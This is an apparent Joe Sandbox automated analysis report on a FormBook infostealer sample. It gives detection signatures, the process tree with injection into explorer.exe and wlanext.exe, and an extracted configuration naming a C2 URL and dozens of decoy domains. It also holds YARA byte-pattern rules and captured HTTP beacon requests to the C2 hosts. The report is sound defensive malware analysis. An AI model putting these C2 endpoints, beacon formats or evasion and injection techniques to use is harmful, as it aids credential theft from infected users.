Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 1cec9342_by_Libranalysis

Overview

General Information

Sample Name:1cec9342_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:412599
MD5:1cec9342ac2c1f91201df672382672f2
SHA1:968ab56e042035a593279775308298cfdcdc0af7
SHA256:a1783d0a9f787d819b960b55c8ebfb227459bcb7daab55996720e8279751736f
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 1cec9342_by_Libranalysis.exe (PID: 6800 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
    • 1cec9342_by_Libranalysis.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dllMetadefender: Detection: 26%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dllReversingLabs: Detection: 58%
          Multi AV Scanner detection for submitted fileShow sources
          Source: 1cec9342_by_Libranalysis.exeVirustotal: Detection: 54%Perma Link
          Source: 1cec9342_by_Libranalysis.exeMetadefender: Detection: 20%Perma Link
          Source: 1cec9342_by_Libranalysis.exeReversingLabs: Detection: 82%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 1cec9342_by_Libranalysis.exeJoe Sandbox ML: detected
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1cec9342_by_Libranalysis.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 4x nop then pop ebx1_2_00406A95
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 4x nop then pop ebx1_1_00406A95
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx7_2_01036A95

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nobleandmarble.com/or4i/
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1Host: www.healshameyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.rogersbeefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1Host: www.nowhealthdays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.ikeberto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1Host: www.directflence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.mmgenius.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1Host: www.rainboxs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.nobleandmarble.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.safegrinder.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1Host: www.tecquestrian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1Host: www.cuntrera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1Host: www.changethecompany.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.16.197.4 3.16.197.4
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1Host: www.healshameyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.rogersbeefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1Host: www.nowhealthdays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.ikeberto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1Host: www.directflence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.mmgenius.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1Host: www.rainboxs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.nobleandmarble.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.safegrinder.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1Host: www.tecquestrian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1Host: www.cuntrera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1Host: www.changethecompany.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.healshameyoga.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 12 May 2021 18:03:26 GMTserver: Apacheaccept-ranges: bytestransfer-encoding: chunkedcontent-type: text/htmlconnection: closeData Raw: 32 31 36 38 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 